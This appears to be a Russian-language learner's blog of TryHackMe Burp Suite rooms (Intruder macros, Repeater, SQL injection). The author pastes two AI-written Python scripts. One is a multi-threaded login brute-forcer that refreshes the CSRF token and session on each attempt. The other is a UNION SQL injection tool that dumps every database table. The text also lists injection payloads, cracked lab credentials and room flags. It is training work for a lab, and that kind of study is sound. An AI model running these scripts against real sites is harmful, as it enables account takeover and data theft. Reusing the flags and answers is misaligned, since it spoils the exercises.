В этом дополнительном упражнении мы рассмотрим более сложный вариант атаки с подбором учетных данных, которую мы проводили ранее. Однако на этот раз были приняты дополнительные меры, чтобы усложнить перебор паролей. Если вы умеете использовать Burp Macros, вы можете попробовать выполнить это задание без приведенных ниже инструкций. В противном случае, давайте перейдем к пошаговому руководству.

Обработка запроса

Для начала перехватите запрос http://10.49.129.42/admin/login/и проанализируйте ответ. Вот пример ответа:

Пример ответа

HTTP/1.1 200 OK
Сервер: nginx/1.18.0 (Ubuntu)
Дата: пятница, 20 августа 2021 г., 22:31:16 по Гринвичу
Content-Type: text/html; charset=utf-8
Соединение: закрыто
Set-Cookie: session=eyJ0b2tlbklEIjoiMzUyNTQ5ZjgxZDRhOTM5YjVlMTNlMjIzNmI0ZDlkOGEifQ.YSA-mQ.ZaKKsUnNsIb47sjlyux_LN8Qst0 ; HttpOnly; Path=/
Разные: Печенье
Front-End-Https: on
Content-Length: 3922
---
<form method="POST">
    <div class="form-floating mb-3">
        <input class="form-control" type="text" name=username placeholder="Имя пользователя" required>
        <label for="username">Имя пользователя</label>
    </div>
    <div class="form-floating mb-3">
        <input class="form-control" type="password" name=password placeholder="Пароль" required>
        <label for="password">Пароль</label>
    </div>
    <input type="hidden" name="loginToken" value="84c6358bbf1bd8000b6b63ab1bd77c5e">
    <div class="d-grid"><button class="btn btn-warning btn-lg" type="submit">Войти!</button></div>
</form>

В этом ответе мы видим, что помимо полей имени пользователя и пароля, теперь установлен сессионный cookie, а также токен CSRF ( Cross-Site Request Forgery ) в форме в виде скрытого поля. Обновление страницы показывает, что и сессионный cookie, и loginToken изменяются при каждом запросе. Это означает, что при каждой попытке входа в систему нам необходимо извлекать действительные значения как для сессионного cookie, так и для loginToken.

Для этого мы будем использовать макросы Burp , чтобы определить повторяющийся набор действий (макрос), которые будут выполняться перед каждым запросом. Этот макрос будет извлекать уникальные значения для cookie сессии и loginToken, заменяя их в каждом последующем запросе нашей атаки.

Учебное пособие

Перейдите по ссылке http://10.49.129.42/admin/login/. Активируйте функцию «Перехват» в модуле «Прокси» и попробуйте войти в систему. Перехватите запрос и отправьте его в Intruder.

Настройте позиции так же, как мы это делали для подбора паролей для входа в службу поддержки методом перебора:

Установите тип атаки на «Pitchfork».
Очистите все предопределенные позиции и выберите только поля ввода имени пользователя и пароля. Наш макрос обработает оставшиеся две позиции.

Теперь перейдите на вкладку «Полезные нагрузки» и загрузите те же списки имен пользователей и паролей, которые мы использовали для атаки на вход в службу поддержки. До этого момента мы настраивали Intruder практически так же, как и при предыдущей атаке с использованием украденных учетных данных; вот здесь-то все и начинает усложняться.

После обработки параметров имени пользователя и пароля нам нужно найти способ получить постоянно меняющийся loginToken и cookie сессии. К сожалению, "рекурсивный grep" здесь не сработает из-за ответа перенаправления, поэтому мы не можем сделать это полностью в Intruder — нам потребуется создать макрос. Макросы позволяют нам многократно выполнять один и тот же набор действий. В данном случае мы просто хотим отправить GET-запрос на адрес /admin/login/.К счастью, настройка — довольно простой процесс. В этом процессе, сравнительно говоря, много этапов, поэтому на следующем GIF-изображении показан весь процесс:

Перейдите на главную вкладку «Настройки» в правом верхнем углу Burp.

Нажмите на категорию "Сессии".

Прокрутите страницу вниз до раздела «Макросы» и нажмите кнопку «Добавить» .

В появившемся меню отобразится история наших запросов. Если в списке еще нет GET-запроса http://10.49.129.42/admin/login/ , перейдите по этой ссылке в браузере, и вы увидите подходящий запрос в списке.

Выбрав запрос, нажмите ОК .
Наконец, дайте макросу подходящее имя, а затем снова нажмите кнопку ОК, чтобы завершить процесс.

Теперь, когда макрос определен, нам необходимо установить правила обработки сессий, которые определяют, как следует использовать макрос.

Оставаясь в разделе «Сессии» основных настроек, прокрутите вверх до раздела «Правила обработки сессий» и выберите « Добавить новое правило».

Откроется новое окно с двумя вкладками: «Подробности» и «Область применения». По умолчанию мы находимся на вкладке «Подробности».
Введите соответствующее описание, затем перейдите на вкладку «Область применения».

В разделе «Область применения инструментов» снимите флажки со всех полей, кроме «Нарушитель» — нам не нужно, чтобы это правило применялось где-либо еще.

В разделе «Область действия URL» выберите «Использовать область действия набора инструментов»; это настроит макрос на работу только с сайтами, добавленными в глобальную область действия (как обсуждалось в разделе «Основы Burp »). Если вы не задали глобальную область действия, оставьте параметр «Использовать пользовательскую область действия» по умолчанию и добавьте http://10.49.129.42/в эту область действия.

Теперь нам нужно вернуться на вкладку «Подробности» и посмотреть раздел «Действия правила». В текущем виде этот макрос будет перезаписывать все параметры в наших запросах Intruder перед их отправкой; это замечательно, поскольку это означает, что токены авторизации и сессионные cookie будут добавлены непосредственно в наши запросы. Тем не менее, перед началом атаки следует ограничить круг обновляемых параметров и cookie:Следующий GIF-файл демонстрирует заключительный этап процесса:

Нажмите кнопку «Добавить» — появится выпадающее меню со списком действий, которые можно добавить.
Выберите пункт «Запустить макрос» из этого списка.

В появившемся новом окне выберите макрос, который мы создали ранее.

Выберите «Обновить только следующие параметры и заголовки», затем нажмите кнопку « Редактировать» рядом с полем ввода под переключателем.
В текстовом поле «Введите новый элемент» введите «loginToken». Нажмите «Добавить» , затем «Закрыть» .
Выберите «Обновить только следующие файлы cookie», затем нажмите соответствующую кнопку «Редактировать» .
Введите "session" в текстовое поле "Введите новый элемент". Нажмите " Добавить" , затем "Закрыть" .

Наконец, нажмите кнопку ОК , чтобы подтвердить действие.

Нажмите ОК , и готово!
Теперь у вас должен быть определен макрос, который будет подставлять токен CSRF и cookie сессии. Осталось только переключиться обратно на Intruder и начать атаку! Примечание: В ходе этой атаки на каждый запрос должен приходить ответ с кодом состояния 302. Если вы видите ошибки 403, значит, ваш макрос работает некорректно.
Как и в случае с атакой с использованием украденных учетных данных для входа в службу поддержки, коды ответов здесь одинаковы (302 Redirects). Снова отсортируйте ответы по длине, чтобы найти действительные учетные данные. Результаты будут не такими однозначными, как в прошлый раз – вы увидите довольно много ответов разной длины, однако ответ, указывающий на успешный вход в систему, все равно должен быть значительно короче.
Используйте найденные вами учетные данные для входа в систему (возможно, вам потребуется обновить страницу входа перед вводом учетных данных).

ну по итогу у меня не получилось, но выручил ИИ быстрый PoC всегда можно написать на коленке

Если кому то надо вот

#!/usr/bin/env python3 """ Multi-threaded brute-force login with dynamic session cookie + CSRF token. For educational / CTF lab use only. """

import requests import re import sys import threading from concurrent.futures import ThreadPoolExecutor, as_completed

# ─── CONFIG ─────────────────────────────────────────────────────────── TARGET = "http://10.49.129.42" LOGIN_URL = f"{TARGET}/admin/login/" USERNAMES = "/home/kali/Desktop/passbastion/usernames.txt" PASSWORDS = "/home/kali/Desktop/passbastion/passwords.txt" THREADS = 100 # ← подкрути под свою машину / лабу (10-30) TIMEOUT = 10

TOKEN_RE = re.compile(r'name="loginToken"\s+value="([^"]+)"') FAIL_MARKERS = ["Invalid credentials", "incorrect", "invalid", "Войти!", "login"]

# Shared state found = threading.Event() counter = 0 counter_lock = threading.Lock() total = 0

def load_wordlist(path: str) -> list[str]: with open(path, "r", encoding="utf-8", errors="ignore") as f: return [line.strip() for line in f if line.strip()]

def try_login(user: str, pwd: str) -> tuple[bool, str, str]: """One attempt: GET fresh token → POST creds → check result.""" global counter if found.is_set(): return False, user, pwd

s = requests.Session() resp = s.get(LOGIN_URL, timeout=TIMEOUT) m = TOKEN_RE.search(resp.text) if not m: return False, user, pwd token = m.group(1)

resp = s.post( LOGIN_URL, data={"username": user, "password": pwd, "loginToken": token}, timeout=TIMEOUT, allow_redirects=True, )

with counter_lock: counter += 1 sys.stdout.write(f"\r[{counter}/{total}] {user}:{pwd} ") sys.stdout.flush()

# Success checks if resp.url != LOGIN_URL and "/login" not in resp.url: return True, user, pwd body = resp.text.lower() if not any(m.lower() in body for m in FAIL_MARKERS): return True, user, pwd

return False, user, pwd

def main(): global total usernames = load_wordlist(USERNAMES) passwords = load_wordlist(PASSWORDS) total = len(usernames) * len(passwords)

print(f"[*] Target: {LOGIN_URL}") print(f"[*] Users: {len(usernames)}") print(f"[*] Passwords: {len(passwords)}") print(f"[*] Total: {total} combinations") print(f"[*] Threads: {THREADS}\n")

pairs = [(u, p) for u in usernames for p in passwords]

with ThreadPoolExecutor(max_workers=THREADS) as pool: futures = {pool.submit(try_login, u, p): (u, p) for u, p in pairs} for future in as_completed(futures): if found.is_set(): break try: ok, user, pwd = future.result() if ok: found.set() print(f"\n\n[+] SUCCESS! → {user}:{pwd}\n") pool.shutdown(wait=False, cancel_futures=True) sys.exit(0) except Exception: pass

print(f"\n\n[-] No valid credentials found.")

if __name__ == "__main__": main()

Ответ: o.bennett:bella1

13. Заключение

Поздравляем с завершением строительства комнаты Burp Suite Intruder!

К этому моменту у вас должно быть четкое понимание того, как эффективно использовать Intruder для автоматизации запросов и выполнения различных типов атак.

В следующем зале модуля мы рассмотрим некоторые другие модули Burp Suite !

День 37. Burp Suite: Repeater

2026-02-24T08:14:01.404Z

Узнайте, как использовать Repeater для дублирования запросов в Burp Suite.

1. Введение

Добро пожаловать в комнату Burp Suite Repeater!

В этой комнате мы рассмотрим расширенные возможности фреймворка Burp Suite, сосредоточившись на модуле Burp Suite Repeater. Опираясь на базовые знания, полученные в комнате «Основы Burp» , мы углубимся в мощные функции инструмента Repeater. Вы узнаете, как обрабатывать и повторно отправлять перехваченные запросы, а также мы рассмотрим различные опции и функции, доступные в этом замечательном модуле. На протяжении всей комнаты мы будем приводить практические примеры, включая упражнение из реальной жизни, чтобы закрепить ваше понимание обсуждаемых концепций.

Если вы новичок в Burp Suite или еще не прошли базовый курс Burp Basics, мы рекомендуем сделать это перед продолжением. Базовый курс Burp Basics дает необходимые знания для этого курса и улучшит ваш опыт обучения.

Разверните целевую виртуальную машину, подключенную к этой задаче, нажав зеленую кнопку «Запустить машину» . Также запустите AttackBox, нажав синюю кнопку «Запустить AttackBox» в верхней части этого окна, если вы используете не свою собственную машину. Затем запустите Burp и следуйте инструкциям в следующих задачах.

2. Что такое ретранслятор?

Прежде чем использовать Burp Suite Repeater, давайте ознакомимся с его назначением и функционалом.

По сути, Burp Suite Repeater позволяет нам изменять и повторно отправлять перехваченные запросы на выбранный нами целевой адрес. Он позволяет нам брать запросы, перехваченные в Burp Proxy , и манипулировать ими, отправляя их многократно по мере необходимости. В качестве альтернативы мы можем вручную создавать запросы с нуля, аналогично использованию инструмента командной строки, такого как cURL.

Возможность редактировать и повторно отправлять запросы несколько раз делает Repeater незаменимым инструментом для ручного исследования и тестирования конечных точек. Он предоставляет удобный графический интерфейс для создания полезной нагрузки запросов и предлагает различные варианты отображения ответа, включая механизм рендеринга для графического представления.

Интерфейс ретранслятора состоит из шести основных разделов, как показано на приведенной ниже схеме с пояснениями:

Список запросов : Расположен в верхнем левом углу вкладки и отображает список запросов к ретранслятору. Можно обрабатывать несколько запросов одновременно, и каждый новый запрос, отправленный в ретранслятор, будет отображаться здесь.
Элементы управления запросами : Расположенные непосредственно под списком запросов, эти элементы управления позволяют отправлять запросы, отменять зависшие запросы и перемещаться по истории запросов.
Разделы «Запрос» и «Ответ» : Занимая большую часть интерфейса, этот раздел отображает запросы и ответы . В разделе «Запрос» можно отредактировать запрос, а затем переслать его, при этом соответствующий ответ будет отображен в разделе «Ответ».
Параметры компоновки : Расположенные в правом верхнем углу окна «Запрос/Ответ», эти параметры позволяют настроить компоновку окон «Запрос» и «Ответ». По умолчанию используется горизонтальная компоновка, но можно также выбрать вертикальную компоновку или объединить окна в отдельные вкладки.
Инспектор : Расположенный справа, Инспектор позволяет анализировать и изменять запросы более интуитивно понятным способом, чем при использовании стандартного редактора. Мы рассмотрим эту функцию в одном из последующих заданий.
Поле « Цель » расположено над инспектором и указывает IP-адрес или домен, на который отправляются запросы. Когда запросы в Repeater отправляются из других компонентов Burp Suite , это поле заполняется автоматически.

Вопрос: Какие разделы обеспечивают более интуитивно понятное управление нашими запросами?

Ответ: Inspector

3. Основные правила использования

На данный момент нам известен интерфейс приложения, но как эффективно его использовать?

Хотя ручное создание запросов является одним из вариантов, чаще всего запрос перехватывается с помощью модуля Proxy , а затем передается в Repeater для дальнейшего редактирования и повторной отправки.

После того как запрос будет перехвачен модулем Proxy , мы можем отправить его в Repeater, щелкнув правой кнопкой мыши по запросу и выбрав «Отправить в Repeater» , или используя сочетание клавиш Ctrl + R.

Вернувшись к Repeater, мы видим, что наш перехваченный запрос теперь доступен в представлении Request:

Теперь в разделах «Цель» и «Инспектор» отображается соответствующая информация, хотя ответа пока нет. После нажатия кнопки «Отправить» быстро заполняется окно «Ответ»:

Если мы захотим изменить какой-либо аспект запроса, мы можем просто ввести текст в поле «Запрос» и снова нажать «Отправить» . Это действие соответствующим образом обновит поле «Ответ» справа. Например, изменение заголовка «Соединение » с «close» на «open» приведет к получению ответа с заголовком «Соединение» , содержащим значение «keep-alive»:

Кроме того, мы можем использовать кнопки истории, расположенные справа от кнопки «Отправить», для навигации по истории изменений, что позволяет нам перемещаться вперед или назад по мере необходимости.

Вопрос: Какое представление будет заполнено при отправке запроса из модуля Proxy в Repeater?

Ответ: Request

4. Панель инструментов анализа сообщений

Repeater предоставляет нам различные варианты отображения запросов и ответов, от шестнадцатеричного вывода до полностью отрисованной страницы.

Чтобы ознакомиться с этими возможностями, можно обратиться к разделу, расположенному над полем для ответа, где доступны следующие четыре кнопки просмотра:

Нам предлагаются следующие варианты отображения:

Pretty : Это вариант по умолчанию, который берет исходный ответ и применяет к нему небольшие улучшения форматирования для повышения читаемости.
Raw : Этот параметр отображает неизмененный ответ, полученный непосредственно от сервера, без какого-либо дополнительного форматирования.
Шестнадцатеричный режим : Выбрав этот режим, мы можем просмотреть ответ в байтовом представлении, что особенно полезно при работе с бинарными файлами.
Рендеринг : Опция рендеринга позволяет визуализировать страницу так, как она будет выглядеть в веб-браузере. Хотя она не часто используется в Repeater, поскольку мы обычно фокусируемся на исходном коде, она все же представляет собой ценную функцию. В большинстве случаев достаточно опции Pretty . Однако полезно ознакомиться с использованием остальных трех опций.

Рядом с кнопками просмотра, справа, находится кнопка «Показать непечатаемые символы» ( \n). Эта функция позволяет отображать символы, которые могут быть невидимы при использовании параметров «Красивый» или «Необработанный» . Например, каждая строка в ответе обычно заканчивается символами \r\n, представляющими собой возврат каретки с последующей новой строкой. Эти символы играют важную роль в интерпретации HTTP- заголовков.

Хотя для большинства задач этот вариант не является обязательным, в определенных ситуациях он может оказаться полезным.

Вопрос: Какой из вариантов позволяет визуализировать страницу так, как она будет выглядеть в веб-браузере?

Ответ: Render

5. Инспектор

Инспектор — это дополнительная функция к представлениям запросов и ответов в модуле Repeater. Он также используется для получения визуально организованной разбивки запросов и ответов, а также для экспериментов, чтобы увидеть, как изменения, внесенные с помощью Инспектора более высокого уровня, влияют на эквивалентные исходные версии.

Инспектор можно использовать как в модуле Proxy , так и в модуле Repeater. В обоих случаях он расположен в правой части окна и отображает список компонентов запроса и ответа:

Среди этих компонентов обычно можно изменять разделы, относящиеся к запросу, что позволяет добавлять, редактировать и удалять элементы. Например, в разделе «Атрибуты запроса » можно изменять элементы, связанные с местоположением, методом и протоколом запроса. Это включает в себя изменение требуемого ресурса для получения данных, изменение метода HTTP с GET на другой вариант или переключение протокола с HTTP /1 на HTTP /2.

К другим разделам, доступным для просмотра и/или редактирования, относятся:

Параметры запроса: это данные, отправляемые на сервер через URL. Например, в GET-запросе, таком как `<URL>` https://admin.tryhackme.com/?redirect=false, параметр запроса ` redirect` имеет значение `false`.
Параметры тела запроса: Аналогично параметрам запроса, но специфичны для POST-запросов. Любые данные, отправленные в рамках POST-запроса, будут отображаться в этом разделе, что позволит нам изменить параметры перед повторной отправкой.
Запрос файлов cookie: В этом разделе представлен изменяемый список файлов cookie, отправляемых с каждым запросом.
Заголовки запроса: Они позволяют нам просматривать, получать доступ и изменять (включая добавление или удаление) любые заголовки, отправляемые с нашими запросами. Редактирование этих заголовков может быть полезным при изучении того, как веб-сервер реагирует на неожиданные заголовки.
Заголовки ответа: В этом разделе отображаются заголовки, возвращаемые сервером в ответ на наш запрос. Изменить их невозможно, поскольку мы не контролируем заголовки, возвращаемые сервером. Обратите внимание, что этот раздел становится видимым только после отправки запроса и получения ответа.

Хотя текстовое представление этих компонентов можно найти в представлениях «Запрос» и «Ответ», табличный формат Инспектора предоставляет удобный способ визуализации и взаимодействия с ними. Экспериментирование с добавлением, удалением и изменением заголовков в Инспекторе помогает понять, как изменяется соответствующая исходная версия в ответе.

Вопрос: Какой раздел в Инспекторе отвечает именно за POST-запросы?

Ответ: Body Parameters

6. Практический пример

Repeater особенно хорошо подходит для задач, требующих многократной отправки аналогичных запросов, как правило, с незначительными изменениями. Это особенно полезно для таких действий, как ручное тестирование на уязвимости SQL- инъекций (будет рассмотрено в следующем задании), попытки обойти фильтры брандмауэра веб-приложений или корректировка параметров при отправке формы.

Начнём с предельно простого примера: использование Repeater для изменения заголовков запроса, отправляемого целевому объекту.

Перехватите запрос http://10.49.156.244/в модуле Proxy и отправьте его в Repeater.

Отправьте запрос один раз из Repeater — в окне ответа вы должны увидеть исходный HTML-код запрошенной страницы.

Попробуйте просмотреть это в одном из других режимов отображения (например, в шестнадцатеричном).

С помощью инспектора (или вручную, если хотите) добавьте заголовок с именем FlagAuthorisedи установите для него значение True, как показано ниже:

Добавлен заголовок с флагом FlagAuthorised.

GET / HTTP/1.1
Host: 10.49.156.244
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
FlagAuthorised: True

Вопрос: Какой флаг вы получаете?

Ответ: THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}

7. Испытание

В предыдущем задании мы продемонстрировали использование Repeater, добавив заголовок и отправив запрос. Это послужило наглядным примером использования Repeater. Теперь настало время для простого задания!

Для начала убедитесь, что перехват отключен в вашем модуле проксиhttp://10.49.156.244/products/ , и перейдите по ссылке . Затем попробуйте нажать на некоторые из ссылок « Посмотреть больше» .

Обратите внимание, что вас перенаправляет на числовой адрес (например, /products/3).

Цель состоит в том, чтобы проверить конечную точку, подтвердив существование числа, к которому вы хотите перейти, и убедившись, что это допустимое целое число. Однако следует учитывать, что может произойти, если эта конечная точка не будет должным образом проверена.

пробуем -1

флаг

Снова включите перехват и зафиксируйте запрос к одной из конечных точек числовых продуктов в модуле Proxy, а затем перенаправьте его в Repeater.

Попробуйте добиться от сервера ошибки "500 Internal Server Error", изменив число в конце запроса на "экстремальные входные данные".

Вопрос: Какой флаг вы получаете, когда вызываете ошибку 500 на конечной точке?

Ответ:THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl}

8. Вызов «Преодолеть лишнюю милю»

Вызов «Преодолеть лишнюю милю»

Это задание предназначено для проверки ваших навыков в несколько более сложной, реальной ситуации с использованием Burp Repeater. Если вы обладаете опытом самостоятельного выполнения SQL- инъекции вручную, вы можете перейти к последнему вопросу и выполнить это задание вслепую. Однако, если вам потребуется помощь, ниже будет предоставлено подробное пошаговое руководство. ( ТАК И СДЕЛАЕМ)

Необходимые предварительные знания

Прежде чем приступить к выполнению этого задания, рекомендуется ознакомиться с принципами SQL- инъекций. Если вы еще этого не сделали, пожалуйста, посетите раздел, посвященный этой теме. Хотя будет предоставлено подробное пошаговое руководство, базовое понимание принципов SQL - инъекций окажется полезным для выполнения этого задания.

Цель испытания

В этом задании ваша задача — выявить и использовать уязвимость типа Union SQL Injection, присутствующую в параметре ID конечной /about/IDточки. Используя эту уязвимость, вы должны осуществить атаку для получения информации о генеральном директоре, хранящейся в базе данных.

Пошаговое руководство

Мы знаем, что существует уязвимость, и знаем, где она находится. Теперь нам просто нужно её использовать!

Начнём с перехвата запроса http://10.49.156.244/about/2в Burp Proxy. После перехвата запроса отправьте его в Repeater, используя команду `send` Ctrl + Rили щёлкнув правой кнопкой мыши и выбрав «Отправить в Repeater».

Теперь, когда наш запрос подготовлен, давайте подтвердим наличие уязвимости. Добавление одного апострофа ( ') обычно достаточно, чтобы сервер выдал ошибку при наличии простой SQL-инъекции, поэтому, используя Инспектор или отредактировав путь запроса вручную, добавьте апостроф после "2" в конце пути и отправьте запрос:

Запрос заголовков из нашего браузера

GET /about/2 ' HTTP/1.1
Хост: 10.49.156.244
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Соединение: закрыто
Запросы на обновление, небезопасные и некорректные: 1

Вы должны увидеть, что сервер отвечает ошибкой "500 Internal Server Error", что указывает на то, что мы успешно прервали выполнение запроса:

Заголовки ответа от сервера

HTTP/1.1 500 INTERNAL SERVER ERROR<
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Aug 2021 23:05:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 3101

Если мы проанализируем тело ответа сервера, то примерно на 40-й строке увидим нечто очень интересное. Сервер сообщает нам, какой запрос мы пытались выполнить:

Чрезмерно подробное сообщение об ошибке, отображающее запрос.

<h2>
    <code>Invalid statement: 
        <code>SELECT firstName, lastName, pfpLink, role, bio FROM people WHERE id = 2'</code>
    </code>
</h2>

Это крайне полезное сообщение об ошибке, которое сервер ни в коем случае не должен нам отправлять, но тот факт, что оно у нас есть, значительно упрощает нашу работу.

В сообщении содержится несколько важных сведений, которые окажутся бесценными при использовании этой уязвимости:

Таблица базы данных, из которой мы выбираем данные, называется people.
Запрос выбирает пять столбцов из таблицы: firstName, lastName, pfpLink, role, и bio. Мы можем предположить, где они будут расположены на странице, что будет полезно при выборе места для размещения наших запросов.

Имея эту информацию, мы можем пропустить этапы перечисления номеров столбцов запроса и имен таблиц.

Хотя нам удалось значительно сократить количество необходимых здесь перечислений, нам все еще нужно найти название целевого столбца.

Зная имя таблицы и количество строк, мы можем использовать объединенный запрос (UNION) для выбора имен столбцов таблицы peopleиз columnsтаблицы в information_schemaбазе данных по умолчанию.

Простой запрос для этого выглядит следующим образом:
/about/0 UNION ALL SELECT column_name,null,null,null,null FROM information_schema.columns WHERE table_name="people"

Это создает объединенный запрос и выбирает целевой столбец, а затем четыре столбца со значением NULL (чтобы избежать ошибки запроса). Обратите внимание, что мы также изменили ID, из которого выбираем данные, 2на 0. Установив ID на недопустимое число, мы гарантируем, что не получим ничего с помощью исходного (легитимного) запроса; это означает, что первая строка, возвращенная из базы данных, будет желаемым ответом от внедренного запроса.

Проанализировав полученный ответ, мы видим, что название первого столбца ( id) было вставлено в заголовок страницы:

Название столбца "id" в заголовке ответа

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Aug 2021 22:12:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Front-End-Https: on
Content-Length: 3360


<!DOCTYPE html>
<html lang=en>
    <head>
        <title>
            About | id None
        </title>
-----

Нам удалось успешно извлечь имя первого столбца из базы данных, но теперь возникла проблема. На странице отображается только первый совпадающий элемент — нам нужно увидеть все совпадающие элементы.

К счастью, мы можем использовать SQL-инъекцию для группировки результатов. Мы по-прежнему можем получать только один результат за раз, но, используя функцию group_concat() , мы можем объединить все имена столбцов в один результат:
/about/0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="people"

Этот процесс показан ниже:

Мы успешно определили восемь столбцов в этой таблице: id, firstName, lastName, pfpLink, role, shortRole, bio, и notes.

Учитывая поставленную задачу, кажется вполне вероятным, что целевым столбцом будет notes.

Наконец, мы готовы извлечь флаг из этой базы данных — у нас есть вся необходимая информация:

Название таблицы: people.
Название целевого столбца: notes.
Идентификатор генерального директора — 1; его можно найти, просто щелкнув по профилю Джеймсона Вулфа на /about/странице и проверив идентификатор в URL-адресе.

Давайте составим запрос для извлечения этого флага:
0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1

И вуаля, у нас есть флаг!

ОТ сюда начнем крутить скулю

ставим ' в запросе. и получаем 500

Проанализировав ответ видим запрос к бд

пробуем посмотреть колонки

имя первого столбца из базы данных, но теперь возникла проблема. На странице отображается только первый совпадающий элемент — нам нужно увидеть все совпадающие элементы.

0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="people"

Получили id,firstName,lastName,pfpLink,role,shortRole,bio,notes

Мы успешно определили восемь столбцов в этой таблице: id, firstName, lastName, pfpLink, role, shortRole, bio, и notes.

Учитывая поставленную задачу, кажется вполне вероятным, что целевым столбцом будет notes.

Наконец, мы готовы извлечь флаг из этой базы данных — у нас есть вся необходимая информация:

Название таблицы: people.
Название целевого столбца: notes.
Идентификатор генерального директора — 1; его можно найти, просто щелкнув по профилю Джеймсона Вулфа на /about/странице и проверив идентификатор в URL-адресе.

Давайте составим запрос для извлечения этого флага:
0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1

попробуем еще получить название бд и все содержимое

даем команду ИИ сделать нам скрипт который откроет нам всю бд

#!/usr/bin/env python3 """ UNION-based SQL Injection exploitation script. For educational / CTF lab use only.

Injection point: GET /about/0 UNION ALL SELECT <col1>,null,null,null,null [FROM ... WHERE ...]

The FROM/WHERE clause must go AFTER all five columns, not inside column 1. """

import requests import re import sys

# ─── CONFIG ─────────────────────────────────────────────────────────── TARGET = "http://10.49.156.244" TIMEOUT = 10 SEP = "0x7C" # | — group_concat separator ROW_SEP = "0x0A" # \n COL_SEP = "0x203A20" # ' : '

TITLE_RE = re.compile(r"<title>\s*About \| (.+?) None\s*</title>", re.DOTALL) H1_RE = re.compile(r'<h1[^>]*>(.+?) None</h1>', re.DOTALL)

def inject(select_expr: str, from_where: str = "") -> str: """ Build: /about/0 UNION ALL SELECT {select_expr},null,null,null,null {from_where} """ path = f"/about/0 UNION ALL SELECT {select_expr},null,null,null,null" if from_where: path += f" {from_where}" url = TARGET + path r = requests.get(url, timeout=TIMEOUT) for regex in (TITLE_RE, H1_RE): m = regex.search(r.text) if m: return m.group(1).strip() return ""

def banner(msg: str): print(f"\n{'=' * 60}\n {msg}\n{'=' * 60}")

def main(): # ── 1. Current database ────────────────────────────────────── banner("CURRENT DATABASE") db = inject("database()") print(f" [+] {db}") if not db: sys.exit("[!] Could not retrieve DB name.")

# ── 2. All databases ───────────────────────────────────────── banner("ALL DATABASES") dbs = inject( f"group_concat(schema_name SEPARATOR {SEP})", "FROM information_schema.schemata" ) for d in dbs.split("|"): marker = " <<<" if d.strip() == db else "" print(f" - {d.strip()}{marker}")

# ── 3. Tables in current DB ────────────────────────────────── banner(f"TABLES IN `{db}`") tables_raw = inject( f"group_concat(table_name SEPARATOR {SEP})", f'FROM information_schema.tables WHERE table_schema="{db}"' ) tables = [t.strip() for t in tables_raw.split("|") if t.strip()] for t in tables: print(f" - {t}") if not tables: sys.exit("[!] No tables found.")

# ── 4. For each table: columns + dump ──────────────────────── for table in tables: # 4a. Columns banner(f"COLUMNS IN `{table}`") cols_raw = inject( f"group_concat(column_name SEPARATOR {SEP})", f'FROM information_schema.columns WHERE table_schema="{db}" AND table_name="{table}"' ) columns = [c.strip() for c in cols_raw.split("|") if c.strip()] for c in columns: print(f" - {c}")

if not columns: print(" [!] No columns — skipping dump.") continue

# 4b. Dump rows banner(f"DATA IN `{table}`") col_expr = "concat_ws(" + COL_SEP + "," + ",".join(columns) + ")" data = inject( f"group_concat({col_expr} SEPARATOR {ROW_SEP})", f"FROM `{db}`.`{table}`" ) if data: header = " : ".join(columns) print(f" {header}") print(f" {'-' * len(header)}") for i, row in enumerate(data.split("\n"), 1): print(f" [{i:>3}] {row}") else: print(" (empty)")

print(f"\n{'=' * 60}\n DONE\n{'=' * 60}\n")

if __name__ == "__main__": main()

Получаем всю бд

Скрипт отработал отлично — вся БД извлечена. Вот краткая сводка:

База данных: site Таблица: people (8 колонок, 6 строк)

Флаг найден в колонке notes у CEO (id=1):

THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh}

Это запись Jameson Wolfe — Co-Founder & CEO, как и требовалось по заданию. У остальных сотрудников поле notes пустое.

Вопрос: Воспользуйтесь уязвимостью SQL-инъекции типа union на сайте.

Ответ: THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh}

9. Заключение

Поздравляем с завершением обустройства комнаты Burp Suite Repeater!

К этому моменту у вас должно быть четкое понимание того, как эффективно использовать Repeater для редактирования, обработки и повторной отправки запросов. Кроме того, вы должны были получить представление о многочисленных практических применениях этого инструмента.

В следующем зале модуля мы рассмотрим модуль Burp Suite Intruder. Intruder позволяет проводить автоматизированные и настраиваемые атаки, что делает его мощным инструментом для различных сценариев тестирования безопасности.

Удачи в следующей комнате и приятного изучения возможностей Burp Suite Intruder !

День 36. Burp Suite: основы

2026-02-24T05:23:59.565Z

Введение в использование Burp Suite для тестирования веб-приложений на проникновение.

1. Введение

Добро пожаловать в раздел «Основы Burp Suite» !

Цель этого занятия — ознакомить с основами фреймворка тестирования безопасности веб-приложений Burp Suite . Мы сосредоточимся на следующих ключевых аспектах:

Подробное введение в Burp Suite .
Подробный обзор различных инструментов, доступных в рамках данной системы.
Подробная инструкция по установке Burp Suite на вашу систему.
Навигация и настройка Burp Suite .

